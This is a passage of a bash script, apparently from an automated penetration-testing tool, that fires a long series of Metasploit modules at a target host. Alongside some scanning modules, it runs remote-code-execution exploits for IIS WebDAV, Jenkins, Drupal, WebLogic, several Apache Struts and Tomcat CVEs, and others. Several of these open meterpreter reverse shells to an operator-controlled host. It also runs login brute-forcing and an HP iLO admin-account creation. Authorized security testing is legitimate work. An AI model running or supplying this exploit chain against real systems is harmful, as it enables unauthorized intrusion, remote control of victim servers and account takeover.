echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; set PAYLOAD windows/meterpreter/reverse_tcp; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
#echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
#msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
#rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
